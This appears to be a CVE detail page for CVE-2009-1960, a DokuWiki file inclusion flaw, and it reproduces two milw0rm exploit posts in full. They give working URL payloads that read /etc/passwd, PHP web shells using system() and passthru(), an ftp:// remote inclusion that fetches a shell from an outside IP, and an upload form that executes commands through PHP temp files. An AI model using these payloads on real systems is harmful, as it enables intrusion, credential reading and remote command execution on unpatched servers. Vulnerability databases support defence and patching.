CVE-2009-1960 : Detail

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.

# Author_ girex # Homepage_ girex.altervista.org # CMS_ Dokuwiki # Homepage_ dokuwiki.org # Affected versions_ 2009-02-14 rc2009-02-06 rc2009-01-30 # Bug_ Local file inclusion # Need_ register_globals = On # Vuln description_ # File: /inc/init.php // if available load a preload config file $preload = fullpath(dirname(__FILE__)).'/preload.php'; if (@file_exists($preload)) include($preload); ... //set the configuration cascade - but only if its not already been set in preload.php global $config_cascade; if (empty($config_cascade)) { $config_cascade = array( 'main' => array( 'default' => array(DOKU_CONF.'dokuwiki.php'), 'local' => array(DOKU_CONF.'local.php'), 'protected' => array(DOKU_CONF.'local.protected.php'), ), ... // load the global config file(s) foreach (array('default','local','protected') as $config_group) { if (empty($config_cascade['main'][$config_group])) continue; foreach ($config_cascade['main'][$config_group] as $config_file) { if (@file_exists($config_file)) { include($config_file); } } } # File preload.php doesn't exists. (so seems for the affected versions) # So we can set $config_cascade arrays via register globals # It's not a RFI couse use of file_exists function. # First of all you can check the dokuwiki's version here: # /[host]/[path]/VERSION # and check if it's a vulnerable version # PoC: [host]/[path]/doku.php?config_cascade[main][default][]=/etc/passwd # PoC: [host]/[path]/doku.php?config_cascade[main][default][]=./README # Note: # You can obtain a remote command execution if you can edit the content of a page # Just insert your php code into it like: <?php system($_GET[cmd]); ?> # And include it: # PoC: [host]/[path]/doku.php?config_cascade[main][default][]=./data/pages/[page_edited].txt # Or you can check if you have permissions to upload file via: # [host]/[path]/lib/exe/mediamanager.php # If so, upload your file with .doc extension then include it: # PoC: [host]/[path]/doku.php?config_cascade[main][default][]=./data/media/[uploaded_file].doc # milw0rm.com [2009-05-26]

Dokuwiki 2009-02-14 Remote/Temporary File Inclusion exploit tested and working I was reading: http://www.milw0rm.com/exploits/8781 by girex [quote] It's not a RFI couse use of file_exists function. [/quote] How wrong brother! trick 1 (ftp:// wrapper with php 5): needs register_globals = on allow_url_fopen = On (default) allow_url_include = On (not default) http://[host]/dokuwiki-2009-02-14/doku.php?config_cascade[main][default][]=ftp://anonymous:anon@1.12.123.123/folder/sh.php&cmd=ls%20-la>out.txt trick 2: needs register_globals = on file_uploads = On (default) include a temporary file passed by the $_FILES[] array: <form action="http://[host]/dokuwiki-2009-02-14/doku.php?cmd=ls%20-la" method="post" enctype="multipart/form-data" target="_self"> <input name="config_cascade[main][default][]" type="file"> <input type="submit" value="submit"> </form> where your shell is like: <?php passthru($_GET[cmd]); die();?> because when there is no prefix or suffix for the affected var, it remains like this: /path_to_temporary_folder/php93.tmp ! Nine:Situations:Group::pyrokinesis site: http://retrogod.altervista.org/ # milw0rm.com [2009-05-26]